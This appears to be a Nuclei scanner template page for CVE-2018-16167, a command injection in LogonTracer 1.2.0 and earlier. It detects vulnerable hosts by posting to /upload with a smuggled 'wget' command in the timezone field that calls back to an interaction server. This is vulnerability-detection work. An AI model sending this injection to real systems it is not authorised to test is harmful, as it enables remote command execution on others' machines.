LogonTracer <=1.2.0 - Remote Command Injection
ID: CVE-2018-16167
Severity: critical
Author: gy741
Tags: cve,cve2018,rce,oast,edb,logontracer,intrusive,jpcert
Description
LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
YAML Source
id: CVE-2018-16167

info:
  name: LogonTracer <=1.2.0 - Remote Command Injection
  author: gy741
  severity: critical
  description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Upgrade LogonTracer to a version higher than 1.2.0.
  reference:
    - https://www.exploit-db.com/exploits/49918
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16167
    - https://jvn.jp/en/vu/JVNVU98026636/index.html
    - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-16167
    cwe-id: CWE-78
    epss-score: 0.27457
    epss-percentile: 0.96794
    cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: jpcert
    product: logontracer
  tags: cve,cve2018,rce,oast,edb,logontracer,intrusive,jpcert

http:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - http
# digest: 490a0046304402203a81af2e1203549bba4280bf2833e0f170be87f0011353ca99d3e2d541a573bd02207c5fdc031884b8085eaa5a8251535c5e3489d1f678268224b6133fb04827f4b6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-16167.yaml"